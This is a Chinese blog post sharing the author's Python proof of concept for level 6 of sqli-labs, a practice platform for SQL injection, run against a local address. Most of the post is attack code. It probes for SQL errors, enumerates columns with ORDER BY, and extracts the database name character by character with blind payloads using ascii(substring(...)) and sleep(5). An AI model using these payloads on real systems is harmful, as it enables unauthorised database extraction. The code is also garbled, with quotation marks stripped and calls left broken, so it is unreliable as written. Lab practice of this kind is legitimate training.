sqli-labs注入工具(第六關利用注入POC)
眾所周知,sqli-labs是一個注入測試平台,相信許多大牛也玩過了,這個POC是我三月份的時候就寫了,需要的夥伴就看下
自己寫的python,代碼水平太低。no噴~
這是第六關的注入poc,第五關的只需要把代碼第44行的"改成 即可。
根據頁面回顯來判斷true或 false,然後再猜解資料庫名的長度,接著挨個字元去比較ascii碼,取正確,最後依次回顯。poc:
import requests;
import re;
import thread;
def panduan():
url2 = str++1;
result = requests.get(url2);
if(SQL syntax in result.text): # Here is wrong
print Its not a injection!;
else:
print Its a int injection;
inject();
def inject():
for i in range(1,100):
result = url + +order+by+ +str(i)+ --+
result1 = requests.get(result)
if(You are in in result1.text):
print result;
else:
break;
mysql();
def mysql():
a = 0;
for i in range(1,10):
url2 = url + and if(length(database())=+str(i)+,2,sleep(5))--+;
result = requests.get(url2);
if(You are in in result.text):
a = i;
else:
continue;
for n in range(1,a+1):
for l in range(33,126):
url3 = url + and ascii(substring(database(),+str(n)+,1))=+str(l)+ --+;
result1 = requests.get(url3);
if(You are in in result1.text):
print str(l);
else:
continue;
thread.exit_thread();
str1 = http://127.0.0.1/sqli-labs-master/Less-6/?id=1;
url = str1+";
url1 = requests.get(url);
if(SQL syntax in url1.text):
print Its seems to be injectable;
else:
print Can be injectable;
inject();
start_new_thread();
代碼運行截圖:
推薦閱讀:
※clang-format 格式宏代碼引起的 Bug
※AI 代碼長啥樣?
※【實驗】Adversarial Video Generation
※Tensorflow小練習(四):快速風格遷移(fast-style-transfer)